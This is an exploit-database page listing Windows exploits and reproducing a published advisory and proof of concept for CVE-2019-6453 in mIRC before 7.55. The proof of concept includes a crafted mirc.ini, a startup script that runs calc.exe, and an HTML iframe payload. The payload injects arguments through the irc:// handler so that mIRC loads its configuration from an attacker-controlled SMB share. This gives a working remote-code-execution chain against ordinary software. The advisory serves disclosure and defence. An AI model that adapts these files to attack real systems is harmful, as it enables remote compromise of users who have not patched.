Menu

Improved exploit search engine. Try it out

"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers"

Author

ProofOfCalc

Platform

windows

Release date

2019-02-18

Release Date Title Type Platform Author
2019-05-24 "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption" remote windows "Simon Zuckerbraun"
2019-05-24 "Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow" local windows "Uday Mittal"
2019-05-15 "Microsoft Windows - 'Win32k' Local Privilege Escalation" local windows ExpLife0011
2019-05-22 "Microsoft Internet Explorer 11 - Sandbox Escape" local windows SandboxEscaper
2019-05-22 "Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation" local windows "Google Security Research"
2019-05-22 "Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation" local windows SandboxEscaper
2019-05-23 "Microsoft Windows 10 (17763.379) - Install DLL" local windows SandboxEscaper
2019-05-24 "Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)" dos windows Achilles
2019-05-24 "Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-24 "Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-21 "Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "Huawei eSpace 1.1.11.103 - DLL Hijacking" local windows LiquidWorm
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'Storage-Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "BulletProof FTP Server 2019.0.0.50 - 'DNS Address' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
Release Date Title Type Platform Author
2019-02-18 "mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers" remote windows ProofOfCalc
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46392/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46392/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46392/40867/mirc-755-remote-command-execution-using-argument-injection-through-custom-uri-protocol-handlers/download/", "exploit_id": "46392", "exploit_description": "\"mIRC < 7.55 - Remote Command Execution Using Argument Injection Through Custom URI Protocol Handlers\"", "exploit_date": "2019-02-18", "exploit_author": "ProofOfCalc", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
# Exploit Title: RCE on mIRC <7.55 using argument injection through custom URI protocol handlers
# Date: 18/02/2019
# Exploit Author: https://twitter.com/proofofcalc/
# Vendor Homepage: https://www.mirc.com
# Software Link: https://www.mirc.com/get.php
# Version: < 7.55
# Tested on: Windows
# CVE : CVE-2019-6453

RCE through URI protocol handlers on mIRC <7.55 (CVE-2019-6453)
===============================================================

Severity: High

mIRC has been shown to be vulnerable to argument injection through its
associated URI protocol handlers that improperly escape their parameters.
Usingavailable command-line parameters, an attacker is able to load a remote
configuration file and to automatically run arbitrary code.

Because mIRC doesn't use any kind of sigil such as -- to mark
the end of the argument list, an attacker is able to pass arguments to mIRC
through a irc:// link and execute arbitrary code by loading a custom
mirc.ini
from an attacker-controlled Samba file server. Please note that ircs://
works
the same way.


PoC
===

The proof of calc requires three files: mirc.ini, calc.ini and poc.html.
We assume a Samba file server is running on the attacker's side. For the
sake of the example, the following pieces of code assume it is running on
host 127.0.0.1 (i.e. replace 127.0.0.1 by your own server's address in
the following files to try this out).

mirc.ini
========

mirc.ini is a custom configuration file that should be located at
C:\mirc-poc\mirc.ini
on the file server.

[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini
========

calc.ini is a remote script file that should be located at
C:\mirc-poc\calc.ini on the
file server.

[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html
========

Just visiting poc.html should work assuming mIRC is set as the default
handler for the
irc:// URI scheme and the browser does not encode the payload. Depending
on the browser
and your configuration, you might still get a prompt (not the case on
Firefox).

<iframe src='irc://? -i\\127.0.0.1\C$\mirc-poc\mirc.ini' />

Affected versions
=================

This PoC runs for mIRC <7.55.

You can trigger the PoC on Edge 42.17134 (last preview version) and
Firefox 64.0.2
(last release). It doesn't work on Chrome because the way Chrome handle
URI protocols
(URI is encoded before being passed to the application).

References
==========

Further explanation (including proof of concept code):

Write-up:
https://proofofcalc.com/cve-2019-6453-mIRC/

PoC:
https://github.com/proofofcalc/cve-2019-6453-poc

mIRC changelog:
https://www.mirc.com/whatsnew.txt

Authors
=======

Baptiste Devigne (Geluchat) and Benjamin Chetioui (SIben)